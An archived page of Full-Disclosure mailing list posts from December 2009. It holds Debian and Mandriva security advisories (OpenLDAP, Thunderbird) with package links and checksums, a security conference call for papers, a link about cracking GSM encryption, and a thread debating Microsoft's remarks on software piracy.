
Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7.orig.tar.gz
Size/MD5 checksum:  1764471 46c0b29cd14010ee6a3f181743aeb6ef
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7-5+lenny3.dsc
Size/MD5 checksum: 1623 b8a904d8fa89cf4ea78fce2d95d95701
  
http://security.debi

[Full-disclosure] [SECURITY] [DSA 1943-1] New openldap2.3/openldap packages fix SSL certificate verification weakness

2009-12-03 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1943  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
December 02, 2009   http://www.debian.org/security/faq
- 


Packages   : openldap openldap2.3
Vulnerability  : insufficient input validation
Problem type   : remote
Debian-specific: no
Debian bug : 553432
CVE ID : CVE-2009-3767

It was discovered that OpenLDAP, a free implementation of the Lightweight
Directory Access Protocol, when OpenSSL is used, does not properly handle a '\0'
character in a domain name in the subject's Common Name (CN) field of an X.509
certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL
servers via a crafted certificate issued by a legitimate Certification 
Authority.

For the oldstable distribution (etch), this problem has been fixed in version
2.3.30-5+etch3 for openldap2.3.

For the stable distribution (lenny), this problem has been fixed in version
2.4.11-1+lenny1 for openldap.

For the testing distribution (squeeze), and the  unstable distribution (sid),
this problem has been fixed in version 2.4.17-2.1 for openldap.


We recommend that you upgrade your openldap2.3/openldap packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips,
mipsel, powerpc, s390 and sparc.

Source archives:


http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz
Size/MD5 checksum:  2971126 c40bcc23fa65908b8d7a86a4a6061251

http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.dsc
Size/MD5 checksum: 1214 36efc1cf2a98c54d4b1da0910e273843

http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.diff.gz
Size/MD5 checksum:   315058 310ce752b78ff3227d78dcd8c1bd60a5

alpha architecture (DEC Alpha)


http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_alpha.deb
Size/MD5 checksum:   293108 2172048d5f8b8b7f379b3414fc5c2e37

http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_alpha.deb
Size/MD5 checksum:  1280772 ab65f162a40607c1787f9b03783a7563

http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_alpha.deb
Size/MD5 checksum:   193768 602a6da790648dd8b0af7d9f386b5c6e

amd64 architecture (AMD x86_64 (AMD64))


http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_amd64.deb
Size/MD5 checksum:   285554 42480b47018eb1d70b9e62d05b925a5b

http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_amd64.deb
Size/MD5 checksum:  1244570 b88256f8259516b09c51f166ff6b4aea

http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_amd64.deb
Size/MD5 checksum:   184652 716cc53985a031d1fe03fede778d6ae5

arm architecture (ARM)


http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_arm.deb
Size/MD5 checksum:  1190314 8686c6a9a9240e6113f92c8bb20d7e1a

http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_arm.deb
Size/MD5 checksum:   254828 49d9c9a250fb4a5a828de5791ee92380

http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_arm.deb
Size/MD5 checksum:   155876 bb45d3104fe4b9811fdb3063da42d3b1

hppa architecture (HP PA RISC)


http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_hppa.deb
Size/MD5 checksum:  1307146 698d7416e4cc544522ce2e25ac9c0fce

http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_hppa.deb
Size/MD5 checksum:   292798 eb9d6d19560a1153cc58ccae3f354a4e

http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_hppa.deb
Size/MD5 checksum:   182568 caade74265ee9d7b8ac77c844c23b413

i386 architecture (Intel ia32)


http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_i386.deb
Size/MD5 checksum:  1177552 f3ccf11b82474593af5e30a272f9edb9

http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_i386.deb
Size/MD5 checksum:   148744 168e58797e74f9b3b6d3c337b6369ca7

http://security.debian.org/pool/updates/main/o/open

[Full-disclosure] Call for Papers - you Sh0t the Sheriff 4 - Security Conference, Brazil

2009-12-03 Thread Luiz Eduardo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello Full-Disclosure,

The call for papers for the yStS (you Sh0t the Sheriff) conference is now
open!

The 4th edition will be, once again, held in Sao Paulo, Brazil, on May
17th, 2010.


INTRODUCTION

you sh0t the Sheriff is a very unique event dedicated to bringing cutting
edge topics to the top-notch Information Security Community in Brazil.

yStS mixes the highest quality presentations and speakers from all over the
globe, covering diverse topics in information security.

Our goal is to help attendees understand the current state of the
information security world by mixing professionals and topics from
different Infosec segments of the market.

For the most part, yStS is an invite-only event. So, submitting a talk is
certainly a good hack to try to be there, especially if you're local.

Due to the success of previous years' editions, yes, we're keeping the same
format:
* Kicked-back and cool environment
* YSTS 4 will be held at an almost secret location (only announced to whom
it may concern a couple of weeks before the con)
* and, once again, this secret location will be, most likely, a club or a
bar
* and yes, we have (some) food and (lots of) drinks



CONFERENCE TOPICS

The focus for YSTS 4 is anything related to InfoSec, including (but not
limited to):
   * Operating Systems
   * Career and Management topics
   * Mobile Devices/Embedded Systems
   * Information Security Audit and Control
   * Social Networking
   * Information Security Policies
   * Messing with Protocols
   * Networking/Telecommunication
   * Wireless and all RF related stuff
   * Incident Response & other applicable (and useful) Infosec Policies
   * Information Warfare
   * Malware/ BotNets
   * User awareness/ Social Networking Threats
   * Secure Programming
   * Hacker Spaces/ hacker community
   * Fuzzing
   * Physical Security
   * Virtualization
   * Webapp Security
   * "the" Cloud
   * Cryptography / Obfuscation
   * Infrastructure and Critical Systems
   * Caipirinha and Beer Hacks
   * and everything else security related you might think would be good for
the conference

We do like shorter talks, so, please submit your talks and remember they
must be 30 minutes long.
The new thing for this year is that we also are opened to some 15-minute
talks.
Some of the smart people around might not need 30 minutes to deliver a
message, or it might be a project that has been just kicked-off.
15 minutes might be your thing and that's nothing to be ashamed about.

you Sh0t the Sheriff is the perfect conference to release your new
projects, trust us. And yes, we do prefer new stuff and "first-time"
speakers are more than welcome. If you got good stuff to speak about,
that's all that matters.

SPEAKER PRIVILEGES
(applies only to the 30 minute-long talks)

* USD 1,000.00 to help covering travel expenses for international speakers
* Breakfast, lunch and dinner during conference
* After-conference official party (and the unofficial ones)
* Auditing products in traditional Brazilian barbecue restaurants
* Life-time free admission for all future yStS conferences (yes, if you 've
spoken before at yStS, you have your free-entry guaranteed, just buy us a
beer, ohh, wait, it's free anyways, isn't it?)


CFP SUBMISSION

Each paper submission must include the following information:

   * Name, title, address, email and phone/contact number
   * Short biography and qualification
   * Speaking experience
   * Do you need or have a visa to come to Brasil?
   * Summary or abstract for your presentation
   * is it a 30 minute or a 15 minute talk?
   * Technical requirements (others than LCD Projector)
   * Other publications or conferences where this material has been or
 will be published/submitted.

We do accept submissions in English, Portuguese or Spanish.

IMPORTANT DATES

Final CFP Submission - February 28th, 2010
Final Notification of Acceptance - March 20th, 2010
Final Material Submission for accepted presentations - May 5th, 2010


Please send your talk submission to cfp/at/ysts.org

CONTACT INFORMATION

Paper Submissions: cfp/at/ysts.org
General Inquiries: b0ard/at/ysts.org
Sponsorship Inquiries:sponsors/at/ysts.org


OTHER STUFF

Check our archives session, including the videos, at www.ysts.org


We hope to see you there!

Luiz Eduardo & Nelson Murilo & Willian Caprino
http://www.ysts.org



-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFLFtLXgo//xpeLCaoRAt9KAJ0RNt0N4ZxiDMiG/r9PCWGcYcDyJwCg+Gkn
62mQcZWLl3024vnWbCPJtYI=
=5/ko
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:217-3 ] mozilla-thunderbird

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:217-3
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A number of security vulnerabilities have been discovered in Mozilla
 Thunderbird:
 
 Security issues in thunderbird could lead to a man-in-the-middle
 attack via a spoofed X.509 certificate (CVE-2009-2408).
 
 A vulnerability was found in xmltok_impl.c (expat) that with
 specially crafted XML could be exploited and lead to a denial of
 service attack. Related to CVE-2009-2625 (CVE-2009-3720).
 
 This update provides the latest version of Thunderbird which are not
 vulnerable to these issues.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
 http://www.mozilla.org/security/announce/2009/mfsa2009-42.html
 https://bugs.gentoo.org/show_bug.cgi?id=280615
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 22ce174eb2b68d124ca745a618ab0526  
2008.0/i586/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.i586.rpm
 78d161d683f079f629f0361f7ebe23cd  
2008.0/i586/mozilla-thunderbird-af-2.0.0.23-0.1mdv2008.0.i586.rpm
 c8995e1c756e7fb460c1cb76d53e3860  
2008.0/i586/mozilla-thunderbird-be-2.0.0.23-0.1mdv2008.0.i586.rpm
 f7311f7ba1fc2dc875c4330ac7ea98a3  
2008.0/i586/mozilla-thunderbird-bg-2.0.0.23-0.1mdv2008.0.i586.rpm
 c1e2f98134e0593c8fd4034e6495604d  
2008.0/i586/mozilla-thunderbird-ca-2.0.0.23-0.1mdv2008.0.i586.rpm
 ca29f94b7ce5b5e96f8e316b38bb2bf8  
2008.0/i586/mozilla-thunderbird-cs-2.0.0.23-0.1mdv2008.0.i586.rpm
 4c167d2cf99c88b4fafc3a493449bb8f  
2008.0/i586/mozilla-thunderbird-da-2.0.0.23-0.1mdv2008.0.i586.rpm
 fcc68e8736ed0fcc9710703bb2be6ef7  
2008.0/i586/mozilla-thunderbird-de-2.0.0.23-0.1mdv2008.0.i586.rpm
 c9c7d119dc3be64f6f22183046a284ee  
2008.0/i586/mozilla-thunderbird-devel-2.0.0.23-0.1mdv2008.0.i586.rpm
 6ce999e22e5426386557a63a5bbe86e3  
2008.0/i586/mozilla-thunderbird-el-2.0.0.23-0.1mdv2008.0.i586.rpm
 c657104140656877b3f0f590c5f81dce  
2008.0/i586/mozilla-thunderbird-en_GB-2.0.0.23-0.1mdv2008.0.i586.rpm
 330d7a5b51baa23e0c57d7925344e093  
2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.23-0.1mdv2008.0.i586.rpm
 1e93bfc29c672524b0e96acaaedf10c9  
2008.0/i586/mozilla-thunderbird-enigmail-ar-2.0.0.23-0.1mdv2008.0.i586.rpm
 6745c465e515e701f38c7941df45117d  
2008.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.23-0.1mdv2008.0.i586.rpm
 bc2d663ca48187e61cb7c15f8a839f69  
2008.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.23-0.1mdv2008.0.i586.rpm
 9b1a530bde521eddf79ecc80ec4cf7e3  
2008.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.23-0.1mdv2008.0.i586.rpm
 52349bca12ed712719c7c3b89c7d9a52  
2008.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.23-0.1mdv2008.0.i586.rpm
 f3217909797b4f1f6e7426599f8a28db  
2008.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.23-0.1mdv2008.0.i586.rpm
 97bf57da4695aa653b8359e27668f458  
2008.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.23-0.1mdv2008.0.i586.rpm
 9f53acbc7fa384c5a57813b748a86ce3  
2008.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.23-0.1mdv2008.0.i586.rpm
 6bd93597bfc9852c4187cffe263981de  
2008.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.23-0.1mdv2008.0.i586.rpm
 03b20c0dcd02a8544e0656883f0f5ec3  
2008.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.23-0.1mdv2008.0.i586.rpm
 d851c78235bf4e333849bb374d285f15  
2008.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.23-0.1mdv2008.0.i586.rpm
 54f25e693156d25b5cd5dd8be6eb66d5  
2008.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.23-0.1mdv2008.0.i586.rpm
 fd9166aa4861d39c17a1b2a1d7b27c3d  
2008.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.23-0.1mdv2008.0.i586.rpm
 e85fc5e881499ff052f697a7a982c39f  
2008.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.23-0.1mdv2008.0.i586.rpm
 a2f9f68cc5c14013b53a400148db7d51  
2008.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.23-0.1mdv2008.0.i586.rpm
 da1f17cc161f3ab46b10f2c77c4ea143  
2008.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.23-0.1mdv2008.0.i586.rpm
 966d4f5f3941b70906a8973ae7a4711e  
2008.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.23-0.1mdv2008.0.i586.rpm
 e3a8abdbbb825834daf555a74fd48016  
2008.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.23-0.1mdv2008.0.i586.rpm
 490a51bbe35b27c1a1b7cd8b198d6602  
2008.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.23-0.1mdv2008.0.i586.rpm
 5b5df29e7dc10963fe6df47dd4e8365b  
2008.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.23-0.1mdv2008.0.i586.rpm
 ba8dd3cf9260a800dd15cc

Re: [Full-disclosure] Microsoft: ‘Piracy no longe r poses a threat to us’

2009-12-03 Thread Kevin Wilcox
2009/12/3 dramacrat :

> How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it
> four?
> I guess this is their way of competing with free software... making
> their software free (yes, yes, money-free vs freedom-free, i know) except to
> those thick enough (or lawsuit vulnerable enough, ie governments
> and corporations) to pay.

Or to those who feel software developers should be compensated for
their time and efforts. It's why some of us buy new copies of OpenBSD
when they make a release, or why some of us have a purchased copy for
each production device we deploy. It's the reason we have a valid,
purchased license of Windows [XP Pro | 7 Ultimate | whatever previous
version] for each machine that's running it. If we're using and
benefiting from the code, why shouldn't the developers get
compensated?

Not everyone has the same feeling of entitlement and greed that you
just displayed and I daresay that neither makes us "lawsuit
vulnerable" nor "thick".

kmw

-- 
Beware the leader who bangs the drums of war in order to whip the
citizenry into a patriotic fervor, for patriotism is indeed a
double-edged sword. It both emboldens the blood, just as it narrows
the mind. And when the drums of war have reached a fever pitch and the
blood boils with hate and the mind has closed, the leader will have no
need in seizing the rights of the citizenry. Rather, the citizenry,
infused with fear and blinded by patriotism, will offer up all of
their rights unto the leader and gladly so - Unattributed, post 9/11

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Open-Source Effort to Hack GSM

2009-12-03 Thread Mike Eber

http://spectrum.ieee.org/telecom/wireless/open-source-effort-to-hack-gsm

.."Karsten Nohl, chief research scientist with H4RDW4RE, a Sunnyvale, 
Calif.-based security research firm, is mounting what could be the most 
ambitious attempt yet to compromise the GSM phone system, which is used 
by over 3 billion people around the world. Others have cracked the A5/1 
encryption technology used in GSM before, but their results have 
remained secret. However, Nohl, who earned a Ph.D. in computer science 
at the University of Virginia and is a member of Germany's Chaos 
Computer Club (CCC), intends to go one big step further: By the end of 
the year, he plans to make the keys available to everyone on the 
Internet."...


-Mike
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’

2009-12-03 Thread netinfinity
Yeah right. What a cheap psychology.. "If you have cracked win 7, then
your bank accounts can be stolen - So buy the original"



-- 
netinfinity

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft: ŒPiracy no longer poses a threat to us¹

2009-12-03 Thread James Lay
From: "Ivan ." 
Date: Thu, 3 Dec 2009 16:24:01 +1100
To: Full-disclosure 
Subject: [Full-disclosure] Microsoft: ŒPiracy no longer poses a threat to
us¹

In a recent interview, managing director of Microsoft Philippines Inc., John
Bessey, has claimed that piracy no longer poses a threat to the software
giant.

http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202



Heh..make an operating system WORTH pirating, then we¹ll talk.  If the
pirates aren¹t interested in your software, you know you have a problem ;)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft: ‘Piracy no longe r poses a threat to us’

2009-12-03 Thread dramacrat
Hahaha.

How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it
four?

I guess this is their way of competing with free software... making
*their* software
free (yes, yes, money-free vs freedom-free, i know) except to those thick
enough (or lawsuit vulnerable enough, ie governments and corporations) to
pay.

2009/12/3 S/U/N 

>  Sure, dude, " please just STEAL my soft, that's gonna kill competitors"
> IE: what happend to PaintShopPro vs Photoshop?
>
>   Cluster #[[   Ivan .   ]] possibly emitted, @Time
> [[   03/12/2009 06:24   ]] The Following #String  **
>
> In a recent interview, managing director of Microsoft Philippines Inc.,
> John Bessey, has claimed that piracy no longer poses a threat to the
> software giant.
>
> http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’

2009-12-03 Thread S/U/N

Sure, dude, " please just STEAL my soft, that's gonna kill competitors"
IE: what happend to PaintShopPro vs Photoshop?

  Cluster #[[   Ivan .   ]] possibly emitted, 
@Time [[   03/12/2009 06:24   ]] The Following #String  
**
In a recent interview, managing director of Microsoft Philippines 
Inc., John Bessey, has claimed that piracy no longer poses a threat to 
the software giant.


http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/